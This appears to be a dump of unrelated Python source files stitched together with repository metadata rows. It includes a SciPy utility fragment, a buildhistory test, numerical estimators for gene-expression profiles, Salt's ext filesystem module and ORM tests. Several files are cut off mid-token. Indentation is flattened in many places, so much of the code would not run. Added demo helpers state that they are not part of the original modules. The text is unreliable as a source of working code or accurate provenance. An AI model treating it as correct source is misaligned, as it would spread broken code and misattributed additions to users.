broadcasted together.
All functions in `choicelist` must accept array arguments in the order
given in `arrays` and must return an array of the same shape as broadcasted
`arrays`.
Examples
--------
>>> x = np.arange(6)
>>> np.select([x <3, x > 3], [x**2, x**3], default=0)
array([ 0, 1, 4, 0, 64, 125])
>>> _lazyselect([x < 3, x > 3], [lambda x: x**2, lambda x: x**3], (x,))
    array([ 0., 1., 4., 0., 64., 125.])
>>> a = -np.ones_like(x)
>>> _lazyselect([x < 3, x > 3],
... [lambda x, a: x**2, lambda x, a: a * x**3],
... (x, a), default=np.nan)
array([ 0., 1., 4., nan, -64., -125.])
"""
arrays = np.broadcast_arrays(*arrays)
tcode = np.mintypecode([a.dtype.char for a in arrays])
out = np.full(np.shape(arrays[0]), fill_value=default, dtype=tcode)
for index in range(len(condlist)):
        func, cond = choicelist[index], condlist[index]
if np.all(cond is False):
continue
cond, _ = np.broadcast_arrays(cond, arrays[0])
temp = tuple(np.extract(cond, arr) for arr in arrays)
np.place(out, cond, func(*temp))
return out
def _aligned_zeros(shape, dtype=float, order="C", align=None):
"""Allocate a new ndarray with aligned memory.
Primary use case for this currently is working around a f2py issue
in NumPy 1.9.1, where dtype.alignment is such that np.zeros() does
not necessarily create arrays aligned up to it.
"""
dtype = np.dtype(dtype)
if align is None:
align = dtype.alignment
if not hasattr(shape, '__len__'):
shape = (shape,)
size = functools.reduce(operator.mul, shape) * dtype.itemsize
buf = np.empty(size + align + 1, np.uint8)
offset = buf.__array_interface__['data'][0] % align
if offset != 0:
offset = align - offset
# Note: slices producing 0-size arrays do not necessarily change
# data pointer --- so we use and allocate size+1
buf = buf[offset:offset+size+1][:-1]
data = np.ndarray(shape, dtype, buf, order=order)
data.fill(0)
return data
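def _demo_aligned_zeros():
    # Small sketch (not part of the original module, helper name is ours):
    # request 64-byte alignment and verify the data pointer honours it.
    arr = _aligned_zeros((4, 4), dtype=np.float64, align=64)
    assert arr.__array_interface__['data'][0] % 64 == 0
    return arr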
def _prune_array(array):
"""Return an array equivalent to the input array. If the input
array is a view of a much larger array, copy its contents to a
newly allocated array. Otherwise, return the input unchanged.
"""
if array.base is not None and array.size < array.base.size // 2:
return array.copy()
return array
def prod(iterable):
"""
Product of a sequence of numbers.
Faster than np.prod for short lists like array shapes, and does
not overflow if using Python integers.
"""
product = 1
for x in iterable:
product *= x
return product
def float_factorial(n: int) -> float:
"""Compute the factorial and return as a float
Returns infinity when result is too large for a double
"""
return float(math.factorial(n)) if n < 171 else np.inf
class DeprecatedImport(object):
"""
Deprecated import with redirection and warning.
Examples
--------
Suppose you previously had in some module::
from foo import spam
If this has to be deprecated, do::
spam = DeprecatedImport("foo.spam", "baz")
to redirect users to use "baz" module instead.
"""
def __init__(self, old_module_name, new_module_name):
self._old_name = old_module_name
self._new_name = new_module_name
__import__(self._new_name)
self._mod = sys.modules[self._new_name]
def __dir__(self):
return dir(self._mod)
def __getattr__(self, name):
warnings.warn("Module %s is deprecated, use %s instead"
% (self._old_name, self._new_name),
DeprecationWarning)
return getattr(self._mod, name)
# copy-pasted from scikit-learn utils/validation.py
def check_random_state(seed):
"""Turn seed into a np.random.RandomState instance
If seed is None (or np.random), return the RandomState singleton used
by np.random.
If seed is an int, return a new RandomState instance seeded with seed.
If seed is already a RandomState instance, return it.
If seed is a new-style np.random.Generator, return it.
Otherwise, raise ValueError.
"""
if seed is None or seed is np.random:
return np.random.mtrand._rand
if isinstance(seed, (numbers.Integral, np.integer)):
return np.random.RandomState(seed)
if isinstance(seed, np.random.RandomState):
return seed
try:
# Generator is only available in numpy >= 1.17
if isinstance(seed, np.random.Generator):
return seed
except AttributeError:
pass
raise ValueError('%r cannot be used to seed a numpy.random.RandomState'
' instance' % seed)
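def _demo_check_random_state():
    # Illustrative sketch (not part of the original module, helper name is
    # ours): the three seed flavours accepted by check_random_state.
    rs_global = check_random_state(None)     # module-level RandomState singleton
    rs_seeded = check_random_state(42)       # fresh RandomState seeded with 42
    rs_same = check_random_state(rs_seeded)  # existing instances pass through
    assert rs_same is rs_seeded
    return rs_global, rs_seeded, rs_same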
def _asarray_validated(a, check_finite=True,
sparse_ok=False, objects_ok=False, mask_ok=False,
as_inexact=False):
"""
Helper function for SciPy argument validation.
Many SciPy linear algebra functions do support arbitrary array-like
input arguments. Examples of commonly unsupported inputs include
matrices containing inf/nan, sparse matrix representations, and
matrices with complicated elements.
Parameters
----------
a : array_like
The array-like input.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Default: True
sparse_ok : bool, optional
True if scipy sparse matrices are allowed.
objects_ok : bool, optional
        True if arrays with dtype('O') are allowed.
mask_ok : bool, optional
True if masked arrays are allowed.
as_inexact : bool, optional
True to convert the input array to a np.inexact dtype.
Returns
-------
ret : ndarray
The converted validated array.
"""
if not sparse_ok:
import scipy.sparse
if scipy.sparse.issparse(a):
msg = ('Sparse matrices are not supported by this function. '
'Perhaps one of the scipy.sparse.linalg functions '
'would work instead.')
raise ValueError(msg)
if not mask_
|
schleichdi2/OPENNFR-6.1-CORE
|
opennfr-openembedded-core/meta/lib/oeqa/selftest/oelib/buildhistory.py
|
Python
|
gpl-2.0
| 3,191
| 0.01943
|
import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs
class TestBlobParsing(unittest.TestCase):
def setUp(self):
import time
self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
dir=get_bb_var('TOPDIR'))
self.repo = Repo.init(self.repo_path)
self.test_file = "test"
self.var_map = {}
def tearDown(self):
import shutil
shutil.rmtree(self.repo_path)
def commit_vars(self, to_add={}, to_remove = [], msg="A commit message"):
if len(to_add) == 0 and len(to_remove) == 0:
return
for k in to_remove:
            self.var_map.pop(k, None)
for k in to_add:
self.var_map[k] = to_add[k]
with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
for k in self.var_map:
repo_file.write("%s = %s\n" % (k, self.var_map[k]))
        self.repo.git.add("--all")
self.repo.git.commit(message=msg)
def test_blob_to_dict(self):
"""
        Test conversion of git blobs to dictionary
"""
valuesmap = { "foo" : "1", "bar" : "2" }
self.commit_vars(to_add = valuesmap)
blob = self.repo.head.commit.tree.blobs[0]
self.assertEqual(valuesmap, blob_to_dict(blob),
"commit was not translated correctly to dictionary")
def test_compare_dict_blobs(self):
"""
        Test comparison of dictionaries extracted from git blobs
"""
changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}
self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
blob1 = self.repo.heads.master.commit.tree.blobs[0]
self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
blob1, blob2, False, False)
var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
self.assertEqual(changesmap, var_changes, "Changes not reported correctly")
def test_compare_dict_blobs_default(self):
"""
        Test default values for comparison of git blob dictionaries
"""
defaultmap = { x : ("default", "1") for x in ["PKG", "PKGE", "PKGV", "PKGR"]}
self.commit_vars(to_add = { "foo" : "1" })
blob1 = self.repo.heads.master.commit.tree.blobs[0]
self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
blob2 = self.repo.heads.master.commit.tree.blobs[0]
change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
blob1, blob2, False, False)
var_changes = {}
for x in change_records:
oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
var_changes[x.fieldname] = (oldvalue, x.newvalue)
self.assertEqual(defaultmap, var_changes, "Defaults not set properly")
|
spottradingllc/zoom
|
server/zoom/www/messages/timing_estimate.py
|
Python
|
gpl-2.0
| 855
| 0
|
import json
from zoom.common.types import UpdateType
class TimeEstimateMessage(object):
def __init__(self):
self._message_type = UpdateType.TIMING_UPDATE
self._contents = dict()
@property
def message_type(self):
return self._message_type
@property
def contents(self):
return self._contents
def update(self, item):
"""
:type item: dict
"""
self._contents.update(item)
def combine(self, message):
"""
:type message: TimeEstimateMessage
"""
        self._contents.update(message.contents)
def clear(self):
self._contents.clear()
    def to_json(self):
_dict = {}
_dict.update({
"update_type": self._message_type,
})
_dict.update(self.contents)
return json.dumps(_dict)
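def _demo_time_estimate_message():
    # Hedged usage sketch (not part of the original module, helper name is
    # ours): a plausible lifecycle of a TimeEstimateMessage. The dictionary
    # keys below are illustrative assumptions, not keys required by zoom, and
    # we assume UpdateType.TIMING_UPDATE is JSON-serializable.
    msg = TimeEstimateMessage()
    msg.update({'average_time': 12.5})
    other = TimeEstimateMessage()
    other.update({'max_time': 30})
    msg.combine(other)    # merge the other message's contents
    return msg.to_json()  # JSON with "update_type" plus both estimates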
|
shichao-an/ctci
|
chapter4/question4.1.py
|
Python
|
bsd-2-clause
| 1,025
| 0
|
from __future__ import print_function
from tree import create_tree
def get_height(root):
if root is None:
return 0
return max(get_height(root.left), get_height(root.right)) + 1
def is_balanced(root):
"""O(n^2)"""
if root is None:
return True
lb = is_balanced(root.left)
rb = is_balanced(root.right)
    tb = abs(get_height(root.left) - get_height(root.right)) <= 1
return lb and rb and tb
def get_height2(root):
"""Get height and check whether balanced"""
if root is None:
return 0
lh = get_height2(root.left)
rh = get_height2(root.right)
if lh != -1 and rh != -1:
if abs(lh - rh) <= 1:
return max(lh, rh) + 1
return -1
def is_balanced2(root):
return get_height2(root) != -1
def _test():
pass
def _print():
a1 = [1, None, 2, 3]
t1 = create_tree(a1)
a2 = [1, 2, 3]
t2 = create_tree(a2)
print(is_balanced(t1))
print(is_balanced(t2))
if __name__ == '__main__':
_test()
_print()
|
yannickmartin/wellFARE
|
wellfare/ILM/fast_estimators.py
|
Python
|
lgpl-3.0
| 5,629
| 0.013857
|
"""
This module implements fast estimators for the time-profiles of
growth rate, promoter activity, and protein concentrations.
These estimators rely on a simple model in which gene expression
is modeled as a one-step process. This makes it possible to compute the
observation matrix directly using an ad-hoc formula.
As a consequence these algorithms are faster and require fewer
parameters than their counterparts in module ``estimators``.
Simple approximations are made to compute the observation matrix,
these are valid as long as the vector of estimation times (ttu) of
the different estimated inputs (growth rate, promoter activity,
protein concentration) has a fine time resolution.
See also:
----------
estimators : collection of functions for the inference
"""
import numpy as np
from scipy.integrate import odeint
from ..curves import Curve
from .methods import DEFAULT_ALPHAS, infer_control
def ilp_growth_rate(curve_volume, ttu, alphas=None, eps_L=.0001):
"""
Returns
--------
mu, v_smoothed, model
As described below.
mu
Vector of inferred mu.
v_smoothed
The predicted value of the observed volume at the same time
points as the data. v_smoothed will appear smoothed compared to
the measured volume.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value of
the parameter alpha used etc.
"""
if isinstance(curve_volume, list):
results = [ilp_growth_rate(v, ttu,
alphas=alphas, eps_L=eps_L)
for v in curve_volume]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
ttv = curve_volume.x
dttu = 1.0*(ttu[1]-ttu[0])
H_ic = np.ones((len(ttv),1))
# dT is a Ny x Nu matrix with
# dT[i,j] = ttv[i] - ttu[j]
dT = np.array([ttv]).T - ttu
H_u = ( np.maximum(0, np.minimum(dttu, dT))
* curve_volume(ttu+ dttu/2))
H = np.hstack([H_ic, H_u])
growth_rate, v_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_volume.y, Nic= 1,
alphas= alphas, eps_L = eps_L)
return ( Curve(ttu, growth_rate),
Curve(ttv, v_smooth),
ic, alpha, ascores )
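def _demo_ilp_growth_rate():
    # Hedged usage sketch (not part of the original module, helper name is
    # ours): infer a growth-rate profile from a synthetic exponential volume
    # curve. The Curve(x, y) construction and the 0.1 per-hour growth rate are
    # illustrative assumptions.
    tt = np.linspace(0, 10, 101)
    volume_curve = Curve(tt, np.exp(0.1 * tt))
    ttu = np.linspace(0, 10, 21)
    mu, v_smooth, ic, alpha, ascores = ilp_growth_rate(volume_curve, ttu)
    return mu, v_smooth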
def ilp_synthesis_rate(curve_fluo, curve_volume, ttu, degr,
alphas=None, eps_L=.0001):
"""
dF/dt = s(t)V(t) - degr*F
Parameters
-----------
curve_fluo
A curve instance representing the (noisy) measured
fluorescence
curve_volume
A curve instance representing the (noisy) measured
volume
ttu
        Times at which the control is estimated.
Returns
--------
synth_rate, fluo_smoothed, ic, alpha, ascores
As described below.
synth_rate
Vector. Inferred control.
fluo_smoothed
The predicted value of the observed data at the same time
points as the data. y_smoothed
will appear smoothed compared
to y.
mod
instance of sklearn.linear_model.RidgeCV, used for the Ridge
regularization / cross-validation. Useful to get the value
of the parameter alpha used etc.
"""
if isinstance(curve_fluo, list):
results = [ilp_synthesis_rate(f, v, ttu, degr,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
if alphas is None: alphas = DEFAULT_ALPHAS
tt_fluo= curve_fluo.x
H_ic = np.exp(-degr*tt_fluo).reshape((len(tt_fluo),1))
model = lambda Y,t: 1 - degr*Y
dtau = ttu[1]-ttu[0]
m = odeint(model,0,[0,dtau]).flatten()[1]
TT = (ttu-np.array([tt_fluo]).T)
H_u = (m*np.exp(degr*TT)*(TT<0)) * curve_volume(ttu + dtau/2)
H = np.hstack([H_ic, H_u])
activity, fluo_smooth, ic, alpha, ascores = \
infer_control(H, y= curve_fluo.y, Nic= 1, alphas= alphas,
eps_L = eps_L)
return ( Curve(ttu, activity),
Curve(tt_fluo, fluo_smooth),
ic, alpha, ascores )
def ilp_concentration(curve_fluo, curve_volume, ttu, dR, dP,
alphas=None, eps_L=0.0001):
""" Retrieves the concentration of a protein P, given
the fluorescence of reporter R.
Parameters
-----------
curve_fluo
A curve instance representing the measured fluorescence
(proportional to the quantities of reporter)
curve_volume
Volume of the population.
dR
Degradation rate of the reporter
dP
Degradation rate of the proteins.
alphas
Smoothing parameters to be tested.
eps_L
Negligible factor for the derivation matrix.
"""
if isinstance(curve_fluo, list):
results = [ilp_concentration(f, v, ttu, dR, dP,
alphas=alphas, eps_L=eps_L)
for f, v in zip(curve_fluo, curve_volume)]
return zip(*results)
tt = curve_fluo.x
deltatau = ttu[1]-ttu[0]
dT = np.array([tt]).T-ttu
dTlz = dT >= 0 # ti-tj > 0
dTlzsdtau = dTlz*(dT < deltatau) # 0 < ti-tj < delta_tau
A = np.exp(dR*np.minimum(deltatau, dT)) - 1
B = dTlz*np.exp(dT*(-dR))*(dP-dR)/dR
Hu = (dTlzsdtau + A*B)*curve_volume(ttu+deltatau/2)
Hic = np.array([np.exp(-dR*tt)]).reshape((len(tt),1))
H = np.hstack([Hic, Hu])
p_est, f_est, ic, a, ascores = infer_control(
H, curve_fluo.y, 1, alphas=alphas, eps_L=eps_L)
return (Curve(ttu, p_est),
Curve(tt, f_est),
ic, a, ascores )
|
saltstack/salt
|
salt/modules/extfs.py
|
Python
|
apache-2.0
| 8,988
| 0.000111
|
"""
Module for managing ext2/3/4 file systems
"""
import logging
import salt.utils.platform
log = logging.getLogger(__name__)
def __virtual__():
"""
Only work on POSIX-like systems
"""
if salt.utils.platform.is_windows():
return (
False,
"The extfs execution module cannot be loaded: only available on "
"non-Windows systems.",
)
return True
def mkfs(device, fs_type, **kwargs):
"""
Create a file system on the specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.mkfs /dev/sda1 fs_type=ext4 opts='acl,noexec'
Valid options are:
* **block_size**: 1024, 2048 or 4096
* **check**: check for bad blocks
* **direct**: use direct IO
* **ext_opts**: extended file system options (comma-separated)
* **fragment_size**: size of fragments
* **force**: setting force to True will cause mke2fs to specify the -F
option twice (it is already set once); this is truly dangerous
* **blocks_per_group**: number of blocks in a block group
* **number_of_groups**: ext4 option for a virtual block group
* **bytes_per_inode**: set the bytes/inode ratio
* **inode_size**: size of the inode
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **blocks_file**: read bad blocks from file
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **test**: set to True to not actually create the file system (mke2fs -n)
* **number_of_inodes**: override default number of inodes
* **creator_os**: override "creator operating system" field
* **opts**: mount options (comma separated)
* **revision**: set the filesystem revision (default 1)
* **super**: write superblock and group descriptors only
* **fs_type**: set the filesystem type (REQUIRED)
* **usage_type**: how the filesystem is going to be used
* **uuid**: set the UUID for the file system
See the ``mke2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"block_size": "b",
"check": "c",
"direct": "D",
"ext_opts": "E",
"fragment_size": "f",
"force": "F",
"blocks_per_group": "g",
"number_of_groups": "G",
"bytes_per_inode": "i",
"inode_size": "I",
"journal": "j",
"journal_opts": "J",
"blocks_file": "l",
"label": "L",
"reserved": "m",
"last_dir": "M",
"test": "n",
"number_of_inodes": "N",
"creator_os": "o",
"opts": "O",
"revision": "r",
"super": "S",
"usage_type": "T",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "mke2fs -F -t {} {}{}".format(fs_type, opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
ret = []
for line in out:
if not line:
continue
elif line.startswith("mke2fs"):
continue
elif line.startswith("Discarding device blocks"):
continue
elif line.startswith("Allocating group tables"):
continue
elif line.startswith("Writing inode tables"):
continue
elif line.startswith("Creating journal"):
continue
elif line.startswith("Writing superblocks"):
continue
ret.append(line)
return ret
def tune(device, **kwargs):
"""
Set attributes for the specified device (using tune2fs)
CLI Example:
.. code-block:: bash
salt '*' extfs.tune /dev/sda1 force=True label=wildstallyns opts='acl,noexec'
Valid options are:
* **max**: max mount count
* **count**: mount count
* **error**: error behavior
* **extended_opts**: extended options (comma separated)
* **force**: force, even if there are errors (set to True)
* **group**: group name or gid that can use the reserved blocks
* **interval**: interval between checks
* **journal**: set to True to create a journal (default on ext3/4)
* **journal_opts**: options for the fs journal (comma separated)
* **label**: label to apply to the file system
* **reserved**: percentage of blocks reserved for super-user
* **last_dir**: last mounted directory
* **opts**: mount options (comma separated)
* **feature**: set or clear a feature (comma separated)
* **mmp_check**: mmp check interval
* **reserved**: reserved blocks count
* **quota_opts**: quota options (comma separated)
* **time**: time last checked
* **user**: user or uid who can use the reserved blocks
* **uuid**: set the UUID for the file system
    See the ``tune2fs(8)`` manpage for a more complete description of these
options.
"""
kwarg_map = {
"max": "c",
"count": "C",
"error": "e",
"extended_opts": "E",
"force": "f",
"group": "g",
"interval": "i",
"journal": "j",
"journal_opts": "J",
"label": "L",
"last_dir": "M",
"opts": "o",
"feature": "O",
"mmp_check": "p",
"reserved": "r",
"quota_opts": "Q",
"time": "T",
"user": "u",
"uuid": "U",
}
opts = ""
for key in kwargs:
if key in kwarg_map:
opt = kwarg_map[key]
if kwargs[key] == "True":
opts += "-{} ".format(opt)
else:
opts += "-{} {} ".format(opt, kwargs[key])
cmd = "tune2fs {}{}".format(opts, device)
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
return out
def attributes(device, args=None):
"""
Return attributes from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.attributes /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["attributes"]
def blocks(device, args=None):
"""
Return block and inode info from dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.blocks /dev/sda1
"""
fsdump = dump(device, args)
return fsdump["blocks"]
def dump(device, args=None):
"""
Return all contents of dumpe2fs for a specified device
CLI Example:
.. code-block:: bash
salt '*' extfs.dump /dev/sda1
"""
cmd = "dumpe2fs {}".format(device)
if args:
cmd = cmd + " -" + args
ret = {"attributes": {}, "blocks": {}}
out = __salt__["cmd.run"](cmd, python_shell=False).splitlines()
mode = "opts"
group = None
for line in out:
if not line:
continue
if line.startswith("dumpe2fs"):
continue
if mode == "opts":
line = line.replace("\t", " ")
comps = line.split(": ")
if line.startswith("Filesystem features"):
ret["attributes"][comps[0]] = comps[1].split()
elif line.startswith("Group") and not line.startswith(
"Group descriptor size"
):
mode = "blocks"
else:
if len(comps) < 2:
continue
ret["attributes"][comps[0]] = comps[1].strip()
if mode == "blocks":
if line.startswith("Group"):
line = line.replace(":", "")
line = line.replace("(", "")
line = line.replace(")", "")
line = line.replace("[", "")
line = line.replace("]", "")
comps = line.split()
blkgrp = comps[1]
                group = "Group {}".format(blkgrp)
                ret["blocks"][group] = {}
ret["blocks"][group]["group"] = blkgrp
ret["blocks"][gro
|
lopiola/integracja_wypadki
|
scripts/statistics/speed_limit_exceeded_by_hour.py
|
Python
|
mit
| 817
| 0
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from scripts.db_api import accident
def usa_query(hour):
return '''
SELECT count(*), (select count(*) from accident
join vehicle on(acc_id = accident.id)
where country = 'USA'
and vehicle.speed > accident.speed_limit
and vehicle.speed > -1
and accident.speed_limit > 0
and date_part('hour', timestamp) = {0}) as exceeded
from accident
where country = 'USA' and date_part('hour', timestamp) = {0};
'''.format(hour)
def get_value(age, dictionary):
    if age not in dictionary:
return 0
return dictionary[age]
if __name__ == '__main__':
print('HOUR\tALL\tEXCEEDED')
for i in xrange(0, 24):
usa_count = accident.execute_query(usa_query(i))
print('{0}\t{1}\t{2}'.format(i, usa_count[0][0], usa_count[0][1]))
|
lantip/sms-komunitas
|
medkom/message/migrations/0001_initial.py
|
Python
|
gpl-3.0
| 1,783
| 0.002804
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('member', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Broadcast',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=20)),
('phone', models.CharField(max_length=15)),
],
),
migrations.CreateModel(
name='Log',
fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('message', models.CharField(max_length=200)),
('persons', models.ManyToManyField(to='member.Person')),
],
),
migrations.CreateModel(
name='Queue',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateTimeField()),
('sender', models.CharField(max_length=20)),
('message', models.CharField(max_length=200)),
('status', models.IntegerField(default=0, choices=[(0, b'Moderated'), (1, b'Pending'), (3, b'Spam')])),
('resolution', models.IntegerField(null=True, choices=[(0, b'Approved'), (1, b'Decline')])),
],
),
migrations.AddField(
model_name='log',
name='queue',
field=models.ForeignKey(blank=True, to='message.Queue', null=True),
),
]
|
torgartor21/solar
|
solar/solar/test/test_orm.py
|
Python
|
apache-2.0
| 15,583
| 0.000385
|
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from .base import BaseResourceTest
from solar.core import resource
from solar.core import signals
from solar import errors
from solar.interfaces import orm
from solar.interfaces.db import base
class TestORM(BaseResourceTest):
def test_no_collection_defined(self):
with self.assertRaisesRegexp(NotImplementedError, 'Collection is required.'):
class TestDBObject(orm.DBObject):
__metaclass__ = orm.DBObjectMeta
def test_has_primary(self):
with self.assertRaisesRegexp(errors.SolarError, 'Object needs to have a primary field.'):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str')
def test_no_multiple_primaries(self):
with self.assertRaisesRegexp(errors.SolarError, 'Object cannot have 2 primary fields.'):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str', is_primary=True)
test2 = orm.db_field(schema='str', is_primary=True)
def test_primary_field(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str', is_primary=True)
t = TestDBObject(test1='abc')
self.assertEqual('test1', t._primary_field.name)
self.assertEqual('abc', t._db_key)
t = TestDBObject()
self.assertIsNotNone(t._db_key)
self.assertIsNotNone(t.test1)
def test_default_value(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
test1 = orm.db_field(schema='str',
is_primary=True,
default_value='1')
t = TestDBObject()
self.assertEqual('1', t.test1)
def test_field_validation(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
t = TestDBObject(id=1)
with self.assertRaises(errors.ValidationError):
t.validate()
t = TestDBObject(id='1')
t.validate()
def test_dynamic_schema_validation(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
schema = orm.db_field()
value = orm.db_field(schema_in_field='schema')
t = TestDBObject(id='1', schema='str', value=1)
with self.assertRaises(errors.ValidationError):
t.validate()
self.assertEqual(t._fields['value'].schema, t._fields['schema'].value)
t = TestDBObject(id='1', schema='int', value=1)
t.validate()
self.assertEqual(t._fields['value'].schema, t._fields['schema'].value)
def test_unknown_fields(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
with self.assertRaisesRegexp(errors.SolarError, 'Unknown fields .*iid'):
TestDBObject(iid=1)
def test_equality(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
test = orm.db_field(schema='str')
t1 = TestDBObject(id='1', test='test')
t2 = TestDBObject(id='2', test='test')
self.assertNotEqual(t1, t2)
t2 = TestDBObject(id='1', test='test2')
self.assertNotEqual(t1, t2)
t2 = TestDBObject(id='1', test='test')
self.assertEqual(t1, t2)
class TestORMRelation(BaseResourceTest):
def test_children_value(self):
class TestDBRelatedObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.input
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.resource
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.resource_input,
TestDBRelatedObject
)
r1 = TestDBRelatedObject(id='1')
r1.save()
r2 = TestDBRelatedObject(id='2')
r2.save()
o = TestDBObject(id='a')
o.save()
self.assertSetEqual(o.related.as_set(), set())
o.related.add(r1)
self.assertSetEqual(o.related.as_set(), {r1})
o.related.add(r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
o.related.remove(r2)
self.assertSetEqual(o.related.as_set(), {r1})
o.related.add(r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
o.related.remove(r1, r2)
self.assertSetEqual(o.related.as_set(), set())
o.related.add(r1, r2)
self.assertSetEqual(o.related.as_set(), {r1, r2})
with self.assertRaisesRegexp(errors.SolarError, '.*incompatible type.*'):
o.related.add(o)
def test_relation_to_self(self):
class TestDBObject(orm.DBObject):
_collection = base.BaseGraphDB.COLLECTIONS.input
__metaclass__ = orm.DBObjectMeta
id = orm.db_field(schema='str', is_primary=True)
related = orm.db_related_field(
base.BaseGraphDB.RELATION_TYPES.input_to_input,
'TestDBObject'
)
o1 = TestDBObject(id='1')
o1.save()
o2 = TestDBObject(id='2')
o2.save()
o3 = TestDBObject(id='2')
o3.save()
o1.related.add(o2)
o2.related.add(o3)
self.assertEqual(o1.related.as_set(), {o2})
self.assertEqual(o2.related.as_set(), {o3})
class TestResourceORM(BaseResourceTest):
    def test_save(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
rr = resource.load(r.id)
self.assertEqual(r, rr.db_obj)
def test_add_input(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
self.assertEqual(len(r.inputs.as_set()), 1)
def test_delete_resource(self):
r = orm.DBResource(id='test1', name='test1', base_path='x')
r.save()
r.add_input('ip', 'str!', '10.0.0.2')
class TestResourceInputORM(BaseResourceTest):
def test_backtrack_simple(self):
sample_meta_dir = self.make_resource_meta("""
id: sample
handler: ansible
version: 1.0.0
input:
value:
schema: str!
value:
""")
sample1 = self.create_resource(
'sample1', sample_meta_dir, {'value': 'x'}
)
sample2 = self.create_resource(
'sample2', sample_meta_dir, {'value': 'y'}
)
sample3 = self.create_res
|
hongliang5623/sentry
|
src/sentry/api/endpoints/project_tagkey_values.py
|
Python
|
bsd-3-clause
| 1,277
| 0
|
from __future__ import absolute_import
from sentry.api.base import DocSection
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
from sentry.models import TagKey, TagKeyStatus, TagValue
class ProjectTagKeyValuesEndpoint(ProjectEndpoint):
doc_section = DocSection.PROJECTS
def get(self, request, project, key):
"""
List a tag's values
Return a list of values associated with this key.
{method} {path}
"""
